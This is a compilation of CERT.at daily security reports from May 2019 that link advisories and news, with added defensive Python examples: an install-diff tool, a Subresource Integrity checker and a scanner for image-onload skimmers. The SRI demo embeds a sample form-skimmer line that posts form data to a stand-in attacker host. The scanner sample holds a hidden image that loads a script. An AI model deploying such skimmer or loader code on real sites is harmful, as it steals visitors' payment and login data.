=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 15-05-2019 18:00 − Thursday 16-05-2019 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Announcing the all new Attack Surface Analyzer 2.0 ∗∗∗
---------------------------------------------
Attack Surface Analyzer 2.0 can help you identify security risks introduced when installing software on Windows, Linux, or macOS by analyzing changes to the file system, registry, network ports, ..
---------------------------------------------
https://www.microsoft.com/security/blog/2019/05/15/announcing-new-attack-su…
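The core of an attack-surface analyzer is a snapshot taken before an install, a second one after it, and a diff of the two. The Python below is an added example of that file-system part only (it is not Microsoft's tool and does not touch the registry or listening ports): it hashes every regular file under a root, records its permission bits, and reports what an "installer" added, removed or changed. The directory layout and the installer's actions are constructed inside a temporary directory so the script runs anywhere.

```python
"""Snapshot-and-diff of a directory tree, the file-system part of what an
attack-surface analyzer does. Added example; the files are constructed."""
import hashlib
import os
import tempfile
from pathlib import Path


def snapshot(root: str) -> dict:
    """Map every regular file under root (POSIX-style relative path) to its
    SHA-256 digest and permission bits, so content and mode changes both show."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = Path(dirpath) / name
            if full.is_symlink():
                continue  # do not follow links that may point outside the tree
            rel = full.relative_to(root).as_posix()
            digest = hashlib.sha256(full.read_bytes()).hexdigest()
            mode = oct(full.stat().st_mode & 0o7777)
            snap[rel] = (digest, mode)
    return snap


def diff_snapshots(before: dict, after: dict) -> dict:
    """Return sorted lists of added, removed and modified paths."""
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    modified = sorted(p for p in set(before) & set(after) if before[p] != after[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict:
    """Simulate an install in a temp dir: constructed sample files, not real software."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "etc").mkdir()
        (Path(root) / "etc" / "app.conf").write_text("debug=0\n")
        (Path(root) / "bin").mkdir()
        (Path(root) / "bin" / "app").write_bytes(b"\x7fELF")
        before = snapshot(root)
        # The "installer" edits a config, drops a setuid helper and removes a binary.
        (Path(root) / "etc" / "app.conf").write_text("debug=1\n")
        helper = Path(root) / "bin" / "helper"
        helper.write_bytes(b"\x7fELF")
        helper.chmod(0o4755)
        (Path(root) / "bin" / "app").unlink()
        after = snapshot(root)
        return diff_snapshots(before, after)


if __name__ == "__main__":
    print(demo())
```

Run it against a real root by calling snapshot() before and after an installation and persisting the first result; the mode field is what surfaces a newly setuid helper even when its hash is unknown.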
∗∗∗ Security update: WordPress plugin WP Live Chat Support vulnerable to attacks ∗∗∗
---------------------------------------------
Because of a flaw, attackers could plant malicious code on WordPress sites that use the WP Live Chat Support add-on.
---------------------------------------------
https://heise.de/-4423479
∗∗∗ Critical vulnerability in Microsoft Remote Desktop Services - updates available ∗∗∗
---------------------------------------------
As part of "Patch Tuesday", Microsoft has released an update for a vulnerability in "Remote Desktop Services". This vulnerability allows an attacker, by means of a specially ..
---------------------------------------------
http://www.cert.at/warnings/all/20190516.html
∗∗∗ An MDS reading list ∗∗∗
---------------------------------------------
We contemplated putting together an LWN article on the "microarchitectural data sampling" (MDS) vulnerabilities, as we've done for past speculative-execution issues. But the truth of the matter is that it's ..
---------------------------------------------
https://lwn.net/Articles/788522/
∗∗∗ IT security - ZombieLoad and co.: software vendors increasingly giving up on processor flaws ∗∗∗
---------------------------------------------
Apple has only partially enabled the current patches because of massive performance losses; Google's V8 team does not consider the effort justified
---------------------------------------------
https://derstandard.at/2000103251668/Zombieload-und-Co-Softwarehersteller-g…
∗∗∗ $100 million GozNym cybercrime network dismantled as suspects charged ∗∗∗
---------------------------------------------
The sophisticated conspiracy saw tens of thousands of victims’ computers infected with the GozNym malware in order to steal online banking passwords, and raid ..
---------------------------------------------
https://hotforsecurity.bitdefender.com/blog/100-million-goznym-cybercrime-n…
∗∗∗ Threat Actor Profile: TA542, From Banker to Malware Distribution Service ∗∗∗
---------------------------------------------
Proofpoint researchers began tracking a prolific actor (referred to as TA542) in 2014 when reports first emerged about the appearance of the group’s signature payload, Emotet (aka Geodo). TA542 consistently uses the latest version of this malware, launching widespread email campaigns ..
---------------------------------------------
https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta54…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Unified Intelligence Center Remote File Injection Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the dashboard gadget rendering of Cisco Unified Intelligence Center could allow an unauthenticated, remote attacker to obtain or manipulate sensitive information between a ..
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerabilities ∗∗∗
---------------------------------------------
Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to ..
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Releases Security Updates for Multiple Products ∗∗∗
---------------------------------------------
https://www.us-cert.gov/ncas/current-activity/2019/05/15/Cisco-Releases-Mul…
∗∗∗ Drupal core - Moderately critical - Third-party libraries - SA-CORE-2019-007 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2019-007
∗∗∗ Advisory: Security Issue with Bluetooth Low Energy (BLE) Titan Security Keys ∗∗∗
---------------------------------------------
https://security.googleblog.com/2019/05/titan-keys-update.html
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 14-05-2019 18:00 − Wednesday 15-05-2019 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Security vulnerabilities: Adobe patches PDF tools and Flash Player ∗∗∗
---------------------------------------------
Adobe has released its regular new security updates. In May 2019, Adobe Reader and Adobe Acrobat in particular should be secured. There is also a warning for Flash Player ..
---------------------------------------------
https://www.golem.de/news/sicherheitsluecken-adobe-patcht-pdf-werkzeuge-und…
∗∗∗ Best of the Web: trust seal distributes keylogger ∗∗∗
---------------------------------------------
The Best of the Web seal is actually meant to certify the security of websites; instead, keyloggers were distributed via a hacked script ..
---------------------------------------------
https://www.golem.de/news/best-of-the-web-trust-siegel-verteilt-keylogger-1…
∗∗∗ May 2019 Security Update Release ∗∗∗
---------------------------------------------
Today, we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to turn on automatic updates. More information ..
---------------------------------------------
https://blogs.technet.microsoft.com/msrc/2019/05/14/may-2019-security-updat…
∗∗∗ Prevent a worm by updating Remote Desktop Services (CVE-2019-0708) ∗∗∗
---------------------------------------------
Today Microsoft released fixes for a critical Remote Code Execution vulnerability, CVE-2019-0708, in Remote Desktop Services – formerly known as Terminal Services – that affects some older versions of Windows. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user ..
---------------------------------------------
https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updat…
∗∗∗ Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking ∗∗∗
---------------------------------------------
In the recent release of iOS 8.4, Apple fixed several vulnerabilities including vulnerabilities that allow attackers to deploy two new kinds of Masque Attack (CVE-2015-3722/3725, and CVE-2015-3725). We call these exploits Manifest Masque and Extension Masque, which can be used to demolish apps, including system apps (e.g., Apple Watch, ..
---------------------------------------------
http://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html
∗∗∗ array_diff_ukey Usage in Malware Obfuscation ∗∗∗
---------------------------------------------
We discovered a PHP backdoor on a WordPress installation that contained some interesting obfuscation ..
---------------------------------------------
http://labs.sucuri.net/?note=2019-05-14
∗∗∗ IT security - Graz researchers discover new flaws in Intel processors ∗∗∗
---------------------------------------------
Processors from the years 2012 to 2018 affected - new updates become necessary
---------------------------------------------
https://derstandard.at/2000103122472/Grazer-Forscher-entdeckten-neue-Sicher…
=====================
= Vulnerabilities =
=====================
∗∗∗ Vuln: SAP BusinessObjects Business Intelligence CVE-2019-0289 Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
SAP BusinessObjects Business Intelligence CVE-2019-0289 Information Disclosure Vulnerability
---------------------------------------------
http://www.securityfocus.com/bid/108311
∗∗∗ Synology-SA-19:23 Samba AD DC ∗∗∗
---------------------------------------------
CVE-2018-16860 allows man-in-the-middle attackers to bypass security constraints via a susceptible version of Directory Server for Windows Domain.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_19_23
∗∗∗ DSA-4443 samba - security update ∗∗∗
---------------------------------------------
https://www.debian.org/security/2019/dsa-4443
∗∗∗ Cisco Releases Security Updates ∗∗∗
---------------------------------------------
https://www.us-cert.gov/ncas/current-activity/2019/05/13/Cisco-Releases-Sec…
∗∗∗ Authorization Bypass Vulnerability in RSA NetWitness (CVE-2019-3724) ∗∗∗
---------------------------------------------
https://sec-consult.com/en/blog/advisories/authorization-bypass-vulnerabili…
∗∗∗ VMSA-2019-0007 ∗∗∗
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2019-0007.html
=====================
= End-of-Day report =
=====================
Timeframe: Monday 13-05-2019 18:00 − Tuesday 14-05-2019 18:00
Handler: Robert Waldner
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Unclear offers for criminal record extracts and certificates of good conduct ∗∗∗
---------------------------------------------
On leumundszeugnis.at, strafregisterauszug.at, fuehrungszeugnis.at and amtsweg.info, consumers can buy online guides or e-books describing how certain applications can be submitted online to the responsible authorities. For many interested parties, however, it is not clearly recognisable that only instructions are being offered, not the official documents themselves.
---------------------------------------------
https://www.watchlist-internet.at/news/unklare-angebote-zu-strafregisteraus…
=====================
= Vulnerabilities =
=====================
∗∗∗ Update WhatsApp now: Bug lets snoopers put spyware on your phone with just a call ∗∗∗
---------------------------------------------
WhatsApp has disclosed a serious vulnerability in the messaging app that gives snoops a way to remotely inject Israeli spyware on iPhone and Android devices simply by calling the target.
The bug, detailed in a Monday Facebook advisory for CVE-2019-3568, is a buffer overflow vulnerability within WhatsApp's VOIP function.
---------------------------------------------
https://www.zdnet.com/article/update-whatsapp-now-bug-lets-snoopers-put-spy…
∗∗∗ Adobe Releases Critical Patches for Flash, Acrobat Reader, and Media Encoder ∗∗∗
---------------------------------------------
Adobe today released its monthly software updates to patch a total of 87 security vulnerabilities in its Adobe Acrobat and Reader, Flash Player and Media Encoder, most of which could lead to arbitrary code execution attacks or worse. None of the flaws patched this month in Adobe products has been found exploited in the wild. Out of 87 total flaws, a whopping number of vulnerabilities (i.e.,
---------------------------------------------
https://thehackernews.com/2019/05/adobe-software-updates.html
∗∗∗ Apple Releases Multiple Security Updates ∗∗∗
---------------------------------------------
Original release date: May 14, 2019. Apple has released security updates to address vulnerabilities in multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Apple security pages for the following products and apply the necessary updates: watchOS 5.2.1, Safari 12.1.1, Apple TV Software 7.3, tvOS 12.3, iOS 12.3, macOS Mojave 10.14.5,
---------------------------------------------
https://www.us-cert.gov/ncas/current-activity/2019/05/14/Apple-Releases-Mul…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by CentOS (flatpak, ghostscript, and python-jinja2), Debian (cups-filters, imagemagick, qt4-x11, and samba), Fedora (httpd and wpa_supplicant), openSUSE (freeradius-server, nmap, python-Jinja2, signing-party, and webkit2gtk3), Red Hat (java-1.7.1-ibm and java-1.8.0-ibm), Scientific Linux (python-jinja2), SUSE (cf-cli, java-1_8_0-openjdk, and libxslt), and Ubuntu (isc-dhcp, openjdk-8, openjdk-lts, samba, and VCFtools).
---------------------------------------------
https://lwn.net/Articles/788373/
∗∗∗ Intel Desktop Firmware: vulnerability allows bypassing security measures ∗∗∗
---------------------------------------------
Intel Desktop Board products BIOS is the BIOS shipped with Intel motherboards. The server firmware provides the basic software operating components for mainboards.
A local attacker can exploit a vulnerability in Intel Desktop Firmware and Intel Server Firmware to bypass security measures.
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K19-0399
∗∗∗ ASUS WebStorage abused to spy on users at the router level ∗∗∗
---------------------------------------------
ESET researcher Anton Cherepanov published a report detailing attack vectors related to WebStorage, ASUS's cloud storage service, on Tuesday. According to the team, the Plead malware may be being distributed through MiTM attacks taking place against ASUS software. Plead is a malware variant which specializes in data theft through a combination of the Plead backdoor and Drigo exfiltration tool.
---------------------------------------------
https://www.zdnet.com/article/asus-webstorage-abused-to-spy-on-users-at-the…
∗∗∗ Cisco Secure Boot Hardware Tampering Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco IOS XE Software Web UI Command Injection Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in IBM® Java SDK affect Liberty for Java for IBM Cloud January 2019 CPU ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: Potential denial of service vulnerability in Liberty for Java for IBM Cloud (CVE-2019-4046) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-potential-denial-of-s…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in Node.js affect IBM Cloud App Management V2018 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ SSA-102144 (Last Update: 2019-05-14): Code Execution Vulnerability in LOGO! Soft Comfort ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/pdf/ssa-102144.pdf
∗∗∗ SSA-542701 (Last Update: 2019-05-14): Vulnerabilities in SIEMENS LOGO! ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf
∗∗∗ SSA-549547 (Last Update: 2019-05-14): Multiple Vulnerabilities in SCALANCE W1750D ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/pdf/ssa-549547.pdf
∗∗∗ SSA-606525 (Last Update: 2019-05-14): Denial-of-Service Vulnerability in SINAMICS PERFECT HARMONY GH180 Ethernet Modbus Interface (G28) ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/pdf/ssa-606525.pdf
∗∗∗ SSA-697412 (Last Update: 2019-05-14): Multiple Vulnerabilities in SIMATIC WinCC, SIMATIC WinCC Runtime, SIMATIC PCS 7, SIMATIC TIA Portal ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/pdf/ssa-697412.pdf
∗∗∗ SSA-705517 (Last Update: 2019-05-14): Remote Code Execution Vulnerability in SIMATIC WinCC and SIMATIC PCS 7 ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/pdf/ssa-705517.pdf
∗∗∗ SSA-804486 (Last Update: 2019-05-14): Multiple Vulnerabilities in SIMATIC Panels and SIMATIC WinCC (TIA Portal) ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/pdf/ssa-804486.pdf
∗∗∗ SSA-865156 (Last Update: 2019-05-14): Denial-of-Service Vulnerability in SINAMICS PERFECT HARMONY GH180 Fieldbus Network ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/pdf/ssa-865156.pdf
∗∗∗ SSA-902727 (Last Update: 2019-05-14): Multiple Vulnerabilities in Licensing Software for SISHIP Automation Solutions ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/pdf/ssa-902727.pdf
∗∗∗ HPESBMU03935 rev.1 - HPE Unified OSS Console Software Products using Apache CouchDB, Remote Code Execution, Remote Escalation of Privilege ∗∗∗
---------------------------------------------
https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 10-05-2019 18:00 − Monday 13-05-2019 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Administration: Microsoft recommends a separately secured device ∗∗∗
---------------------------------------------
Anyone who administers complex systems can quickly become an attractive target. Microsoft offers some tips from its own practice to minimise this risk, among them the use of dedicated devices.
---------------------------------------------
https://www.golem.de/news/administration-microsoft-empfiehlt-ein-separat-ab…
∗∗∗ Hash function: the next nail in the coffin of SHA-1 ∗∗∗
---------------------------------------------
Everyone knows it, really: the SHA-1 hash function is dead. Researchers have now found a method that makes attacks on it even more relevant in practice.
---------------------------------------------
https://www.golem.de/news/hashfunktion-der-naechste-nagel-im-sarg-von-sha-1…
∗∗∗ AR19-133A: Microsoft Office 365 Security Observations ∗∗∗
---------------------------------------------
Original release date: May 13, 2019 Summary As the number of organizations migrating email services to Microsoft Office 365 (O365) and other cloud services increases, the use of third-party companies that move organizations to the cloud is also increasing. Organizations and their third-party partners need to be aware of the risks involved in transitioning to O365 and other cloud services.
---------------------------------------------
https://www.us-cert.gov/ncas/analysis-reports/AR19-133A
∗∗∗ Hackers are collecting payment details, user passwords from 4,600 sites ∗∗∗
---------------------------------------------
Hackers have breached analytics service Picreel and open-source project Alpaca Forms and have modified JavaScript files on the infrastructure of these two companies to embed malicious code on over 4,600 websites, security researchers have told ZDNet. The attack is ongoing, and the malicious scripts are still live at the time of this article's publishing.
---------------------------------------------
https://www.zdnet.com/article/hackers-are-collecting-payment-details-user-p…
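A site that embeds a third party's script is only as trustworthy as that third party's deployment pipeline, which is exactly what was compromised here. Subresource Integrity (SRI) lets the embedding site pin the hash of the script it reviewed, so a file modified on the vendor's CDN is refused by the browser. The Python below is an added example, not code from ZDNet or either vendor: it computes the integrity attribute value, emits the pinned tag, and then checks a "fetched" body the way a browser would. The script bodies and the hostnames are constructed.

```python
"""Subresource Integrity for third-party scripts. Added example; the script
bodies below are constructed, not the real Picreel or Alpaca Forms files."""
import base64
import hashlib

SRI_ALGOS = ("sha256", "sha384", "sha512")  # the only algorithms SRI accepts


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the integrity token browsers compare against: algo-base64(digest)."""
    if algo not in SRI_ALGOS:
        raise ValueError("SRI allows only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """Emit the <script> tag a site owner pins at deploy time.
    crossorigin is required for SRI on cross-origin scripts."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def verify_sri(integrity: str, fetched: bytes) -> bool:
    """What the browser does at load time. The attribute may list several
    tokens; any one matching the fetched bytes allows execution."""
    for token in integrity.split():
        algo, _, _b64 = token.partition("-")
        if algo in SRI_ALGOS and sri_hash(fetched, algo) == token:
            return True
    return False


# Constructed sample: the script as reviewed, and a tampered copy with a skimmer appended.
ORIGINAL = b"window.track=function(e){/* analytics */};\n"
TAMPERED = ORIGINAL + (
    b"document.forms[0].addEventListener('submit',e=>fetch("
    b"'https://attacker.invalid/c',{method:'POST',body:new FormData(e.target)}));\n"
)

PINNED_INTEGRITY = sri_hash(ORIGINAL)
PINNED_TAG = script_tag("https://cdn.example.invalid/tracker.js", ORIGINAL)


def demo() -> dict:
    return {
        "original_loads": verify_sri(PINNED_INTEGRITY, ORIGINAL),
        "tampered_loads": verify_sri(PINNED_INTEGRITY, TAMPERED),
    }


if __name__ == "__main__":
    print(PINNED_TAG)
    print(demo())
```

The trade-off is operational: a legitimate vendor update also fails the check until the tag is re-pinned, so SRI suits scripts whose releases you review, and it does nothing for a script the vendor loads dynamically from inside the pinned file.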
∗∗∗ Microsoft extends BitLocker management options for enterprises ∗∗∗
---------------------------------------------
Microsoft is planning extensions to Intune and System Center Configuration Manager for managing BitLocker encryption in enterprise environments.
---------------------------------------------
https://heise.de/-4420137
∗∗∗ Patch now: attackers target older SharePoint Server vulnerability ∗∗∗
---------------------------------------------
The vulnerability CVE-2019-0604, already fixed in February/March, is being actively exploited. Anyone who has not yet installed the updates should act now at the latest.
---------------------------------------------
https://heise.de/-4420747
∗∗∗ Images Loading Credit Card Swipers ∗∗∗
---------------------------------------------
We’ve come across an interesting approach to injecting credit card swipers into Magento web pages. Instead of injecting a real script, attackers insert a seemingly benign, invisible image from the same site. The catch is, the tag has an "onload" event handler that loads the malicious script.
---------------------------------------------
http://labs.sucuri.net/?note=2019-05-10
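The trick described above evades scanners that only look for <script> tags or external domains: the loader is an event handler on an image served from the shop itself. A scan therefore has to look at handler attributes, not at element names. The Python below is an added example built on the standard library's HTML parser, not Sucuri's code: it flags <img> tags whose onload/onerror/onabort handlers contain script-loading or decoding constructs and notes whether the image is hidden. The sample page is constructed, not a real Magento store.

```python
"""Flag <img> tags whose event-handler attributes load or evaluate script.
Added example; the HTML below is constructed, not from a real store."""
from html.parser import HTMLParser

# Handlers that fire without any user interaction.
EVENT_ATTRS = {"onload", "onerror", "onabort"}
# Constructs a skimmer loader typically needs; a heuristic, tune per site.
SUSPECT_TOKENS = ("script", "eval(", "fromcharcode", "atob(", "appendchild", "document.write")


class ImageHandlerScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        attrs = {k.lower(): (v or "") for k, v in attrs}
        for name in EVENT_ATTRS & set(attrs):
            handler = attrs[name]
            lowered = handler.lower()
            if any(tok in lowered for tok in SUSPECT_TOKENS):
                style = attrs.get("style", "").replace(" ", "").lower()
                self.findings.append({
                    "src": attrs.get("src", ""),
                    "attr": name,
                    "handler": handler,
                    # Invisible images are the tell: nothing legitimate needs them to run code.
                    "hidden": "display:none" in style
                              or attrs.get("width") == "0" or attrs.get("height") == "0",
                })


def scan_html(html: str) -> list:
    parser = ImageHandlerScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: a benign logo, a 0x0 "image" that pulls a loader, a harmless onerror.
SAMPLE = """
<html><body>
<img src="/media/logo.png" alt="shop">
<img src="/media/pixel.gif" width="0" height="0"
     onload="var s=document.createElement('script');s.src='/media/js/stat.js';document.body.appendChild(s)">
<img src="/media/banner.jpg" onerror="this.style.display='none'">
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```

Run it over rendered pages rather than templates, since the injection lives in the served HTML, and treat any hit with hidden=True as a priority: the same-origin script path it loads is where the swiper itself sits.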
∗∗∗ NVIDIA Patches High Severity Bugs in GPU Display Driver ∗∗∗
---------------------------------------------
NVIDIA has released patches to address High severity vulnerabilities in its NVIDIA GPU Display Driver that could allow an attacker to escalate privileges or execute code on vulnerable systems.
---------------------------------------------
https://www.securityweek.com/nvidia-patches-high-severity-bugs-gpu-display-…
=====================
= Vulnerabilities =
=====================
∗∗∗ SQLite: vulnerability in library allows remote code execution ∗∗∗
---------------------------------------------
SQLite has been available in version 3.28.0 since April. In view of a critical vulnerability in earlier versions, developers should switch as quickly as possible.
---------------------------------------------
https://heise.de/-4421109
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (atftp, ghostscript, openjdk-7, and postgresql-9.4), Fedora (java-11-openjdk, mosquitto, and php), Mageia (bash, binutils, clamav, cronie, jasper, kernel, mxml, openexr, openssh, python, qt4, svgsalamander, sysstat, tar, and tcpreplay), openSUSE (openssl, python3, sqlite3, webkit2gtk3, and wireshark), Red Hat (bind, flatpak, freeradius:3.0, java-1.8.0-openjdk, python-jinja2, rh-ror42-rubygem-actionpack, rh-ror50-rubygem-actionpack, rh-ruby23-ruby, [...]
---------------------------------------------
https://lwn.net/Articles/788266/
∗∗∗ Gemalto DS3 Authentication Server / Ezio Server Command Injection / File Disclosure ∗∗∗
---------------------------------------------
https://cxsecurity.com/issue/WLB-2019050121
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM® Java SDK affects WebSphere Application Server April 2019 CPU that is bundled with IBM WebSphere Application Server Patterns ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: IBM MQ RDQM and IBM MQ Appliance are vulnerable to a denial of service attack (CVE-2018-1084) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-mq-rdqm-and-ibm-m…
∗∗∗ IBM Security Bulletin: Rational DOORS Web Access is affected by a Cross-site scripting vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-rational-doors-web-ac…
∗∗∗ Linux kernel vulnerability CVE-2017-8824 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K15526101
∗∗∗ Vulnerability Spotlight: Multiple vulnerabilities in the Roav A1 Dashcam ∗∗∗
---------------------------------------------
https://blog.talosintelligence.com/2019/05/vulnerability-spotlight-multiple…
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 09-05-2019 18:00 − Friday 10-05-2019 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Drupal: security release for the CMS repairs vulnerable component ∗∗∗
---------------------------------------------
Drupal users should update the CMS core. The developers have fixed a vulnerability rated "moderately critical".
---------------------------------------------
https://heise.de/-4420050
∗∗∗ BSI provides open-source verification tool for Evidence Records ∗∗∗
---------------------------------------------
https://www.bsi.bund.de/DE/Presse/Kurzmeldungen/Meldungen/Pruefwerkzeug-Evi…
∗∗∗ Types of backup and five backup mistakes to avoid ∗∗∗
---------------------------------------------
What are the main types of backup operations and how to avoid the sinking feeling of realizing that you may not get your data back?
---------------------------------------------
https://www.welivesecurity.com/2019/05/10/types-backup-mistakes-avoid/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (bind9, postgresql-9.6, qemu, and symfony), Fedora (kernel, kernel-tools, mod_cluster, rubygem-actioncable, rubygem-actionmailer, rubygem-actionpack, rubygem-actionview, rubygem-activejob, rubygem-activemodel, rubygem-activerecord, rubygem-activestorage, rubygem-activesupport, rubygem-rails, and rubygem-railties), openSUSE (wireshark), Red Hat (freeradius), Scientific Linux (freeradius), and Ubuntu (bind9 and wpa).
---------------------------------------------
https://lwn.net/Articles/788066/
∗∗∗ ZDI-19-459: (0Day) Hewlett Packard Enterprise Intelligent Management Center Standard ImcLoginMgrImpl Hard-coded Cryptographic Key Credentials Disclosure Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-19-459/
∗∗∗ ZDI-19-458: (0Day) Hewlett Packard Enterprise Intelligent Management Center dbman Use of Hard-coded Credentials Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-19-458/
∗∗∗ ZDI-19-457: (0Day) Hewlett Packard Enterprise Intelligent Management Center AMF3 Externalizable Deserialization of Untrusted Data Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-19-457/
∗∗∗ ZDI-19-456: (0Day) Hewlett Packard Enterprise Intelligent Management Center AccessMgrServlet className Deserialization of Untrusted Data Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-19-456/
∗∗∗ ZDI-19-455: (0Day) Hewlett Packard Enterprise Intelligent Management Center TopoMsgServlet Expression Language Injection Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-19-455/
∗∗∗ ZDI-19-454: (0Day) Hewlett Packard Enterprise Intelligent Management Center soapConfigContent Expression Language Injection Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-19-454/
∗∗∗ ZDI-19-453: (0Day) Hewlett Packard Enterprise Intelligent Management Center ictExpertCSVDownload Expression Language Injection Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-19-453/
∗∗∗ ZDI-19-452: (0Day) Hewlett Packard Enterprise Intelligent Management Center iccSelectDevType Expression Language Injection Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-19-452/
∗∗∗ Security Notice - Statement on the Suspected Huawei Issue in the U.S. DoD's 5G Ecosystem Report ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-notices/2019/huawei-sn-20190510-01-…
∗∗∗ IBM Security Bulletin: Security Vulnerability in IBM® Java SDK affect IBM Rational Team Concert Apr 2019 CPU ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-security-vulnerabilit…
∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in IBM® Java SDK affect WebSphere Application Server April 2019 CPU ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: A vulnerability has been identified in IBM Spectrum Scale with CES stack enabled that could allow sensitive data to be included with service snaps. This data could be sent to IBM during service engagements (CVE-2019-4259) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-a-vulnerability-has-b…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Financial Transaction Manager for ACH Services for Multi-Platform ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: Financial Transaction Manager for ACH Services is affected by a potential cross-site request forgery vulnerability (CVE-2018-1790) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-financial-transaction…
